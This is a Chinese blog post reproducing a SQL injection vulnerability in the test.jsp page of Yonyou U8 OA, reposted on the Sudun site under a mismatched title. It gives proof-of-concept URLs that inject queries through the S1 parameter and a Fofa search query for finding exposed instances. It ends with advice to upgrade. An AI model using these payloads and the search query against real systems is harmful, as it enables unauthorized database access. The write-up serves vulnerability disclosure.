1. 速盾网络首页
  2. 网站运维

用友sql server(用友u8api教程)

七芒星实验室 网站运维

影响范围

用友U8 OA

漏洞类型

SQL注入

利用条件

影响范围

漏洞概述

用友U8 OA test.jsp文件存在SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞

漏洞复现

登录页面如下

http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(user()))

用友sql server(用友u8api教程)

用友sql server(用友u8api教程)

或者直接查询user也可以:

http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20user())

用友sql server(用友u8api教程)

漏洞检索

Fofa:

app=\\\"用友U8+OA基础版\\\"

安全建议

升级到最新版本~

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34244.html

(0)
七芒星实验室's avatar七芒星实验室
0 0
上一篇 2024年4月18日 下午7:32
下一篇 2024年4月18日 下午7:34

相关推荐

  • 自学编程有多难? 网站运维

    自学编程有多难?

    两个人一起学编程,一个人三天打鱼两天晒网,打两个小时游戏摸十分钟书,学了三个月下来,会用C语言做点简单的数学题。你跑过去问他,自学编程难不难?他一定会跟你说,难

    小su's avatar 小su
    2024年9月20日
    0
  • 电脑硬件维护小窍门,这些你都知道吗? 网站运维

    电脑硬件维护小窍门,这些你都知道吗?

    1.电脑应放置于整洁的房间,避免灰尘太多对各电脑配件造成不良影响;电脑周围应保留足够的散热空间,不要堆放杂物;电脑工作期间不要吸烟,烟雾对电脑的损坏也不可小看;

    小su's avatar 小su
    2024年9月20日
    0
  • 网易VIP邮箱欠费,没办法续费。 网站运维

    网易VIP邮箱欠费,没办法续费。

    网易VIP邮箱欠费,我竟然怎么都无法续费网易VIP邮箱欠费了,准备续费,一系列的操作让我崩溃一、点续费,页面无限循环二、申请恢复,必填信息是注册时间,我都注册了

    小su's avatar 小su
    2024年9月21日
    0
  • 您上网时遇到过404 NOT FOUND吗? 网站运维

    您上网时遇到过404 NOT FOUND吗?

    不适合出门的时候,不需要出门的时候,不愿意出门的时候,干点啥才不那么无聊?备好瓜子零食和饮料,最好有个抱枕手中抱,打开电源,接好信号,上网冲浪自在又美好!咦,为

    小su's avatar 小su
    2024年8月30日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注